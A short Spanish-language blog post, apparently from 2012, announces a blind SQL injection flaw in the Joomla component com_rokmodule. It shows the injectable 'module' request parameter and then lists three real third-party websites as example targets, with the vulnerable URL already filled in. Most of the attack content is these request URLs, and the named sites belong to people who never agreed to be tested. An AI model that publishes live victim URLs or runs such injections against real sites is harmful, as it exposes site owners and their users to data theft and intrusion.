Joomla Component RokModule Blind SQLi
Bueno laburando encontramos un Bug 0-Day en Joomla, Un Componente que permite La Injeccion SQLi, Normalmente Blind SQli Titulo: Joomla Component RokModule Blind SQLi [module] Vulnerability Nombre del Componente: Com_rokmodule Empresa: http://www.rockettheme.com/ Testeado: Linux Backtrack Autor: Yarolinux Fecha: 09/09/2012 Bueno la Injeccion Va de la siguiente manera: http://localhost/index.php?option=com_rokmodule&tmpl=component&type=raw&module=[sqli] http://localhost/web/index.php?option=com_rokmodule&tmpl=component&type=raw&module=[sqli]or[BlindSQLi] Ejemplos: http://motoclubalmeria.com/index.php?option=com_rokmodule&tmpl=component&type=raw&module= http://www.tribune.com.ng/sat/index.php?option=com_rokmodule&tmpl=component&type=raw&module=Sports&offset= http://endstation-rechts.de/index.php?option=com_rokmodule&tmpl=component&type=raw&module=Schlagzeilen&offset=…
Acerca de Mi Dylan Irzi
Colombiano, WebMaster, Independent Security Researcher , Apasionado por la Seguridad Informatica, #WhiteHat. Programador. Co-Fundador y DueƱo de WebSecurityDev.com
